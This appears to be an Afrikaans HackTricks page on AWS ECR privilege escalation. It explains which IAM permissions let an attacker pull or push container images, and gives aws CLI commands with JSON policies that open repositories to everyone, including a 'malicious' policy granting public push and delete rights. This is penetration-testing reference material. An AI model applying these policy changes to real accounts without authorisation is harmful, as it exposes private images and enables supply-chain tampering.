AWS - ECR Privesc

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

ECR

ecr:GetAuthorizationToken,ecr:BatchGetImage

'n Aanvaller met die ecr:GetAuthorizationToken en ecr:BatchGetImage kan aanmeld by ECR en afbeeldings aflaai.

Vir meer inligting oor hoe om afbeeldings af te laai:

AWS - ECR Post Exploitation

Potensiële Impak: Indirekte privesc deur sensitiewe inligting in die verkeer te onderskep.

ecr:GetAuthorizationToken, ecr:BatchCheckLayerAvailability, ecr:CompleteLayerUpload, ecr:InitiateLayerUpload, ecr:PutImage, ecr:UploadLayerPart

'n Aanvaller met al hierdie toestemmings kan aanmeld by ECR en afbeeldings oplaai. Dit kan nuttig wees om voorregte te verhoog na ander omgewings waar daardie afbeeldings gebruik word.

Om te leer hoe om 'n nuwe afbeelding op te laai/een op te dateer, kyk na:

AWS - EKS Enum

ecr-public:GetAuthorizationToken, ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload, ecr-public:InitiateLayerUpload, ecr-public:PutImage, ecr-public:UploadLayerPart

Soos die vorige afdeling, maar vir openbare bewaarplekke.

ecr:SetRepositoryPolicy

'n Aanvaller met hierdie toestemming kan die bewaarplekbeleid verander om homself (of selfs almal) lees-/skryftoegang te gee. Byvoorbeeld, in hierdie voorbeeld word leestoegang aan almal gegee.

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json

Inhoud van my-policy.json:

{
"Version" : "2008-10-17",
"Statement" : [
{
"Sid" : "allow public pull",
"Effect" : "Allow",
"Principal" : "*",
"Action" : [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}

ecr-public:SetRepositoryPolicy

Soos die vorige afdeling, maar vir openbare bewaarplekke. 'n Aanvaller kan die bewaarplekbeleid van 'n ECR Openbare bewaarplek wysig om ongemagtigde openbare toegang te verleen of om hul voorregte te verhoog.

bashCopy code# Create a JSON file with the malicious public repository policy
echo '{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "MaliciousPublicRepoPolicy",
"Effect": "Allow",
"Principal": "*",
"Action": [
"ecr-public:GetDownloadUrlForLayer",
"ecr-public:BatchGetImage",
"ecr-public:BatchCheckLayerAvailability",
"ecr-public:PutImage",
"ecr-public:InitiateLayerUpload",
"ecr-public:UploadLayerPart",
"ecr-public:CompleteLayerUpload",
"ecr-public:DeleteRepositoryPolicy"
]
}
]
}' > malicious_public_repo_policy.json

# Apply the malicious public repository policy to the ECR Public repository
aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json

Potensiële Impak: Onbevoegde openbare toegang tot die ECR Openbare bewaarplek, wat enige gebruiker in staat stel om beelde te stuur, te haal of te verwyder.

ecr:PutRegistryPolicy

'n Aanvaller met hierdie toestemming kan die bewaarplekbeleid verander om homself, sy rekening (of selfs almal) lees-/skryftoegang te gee.

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json
Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Last updated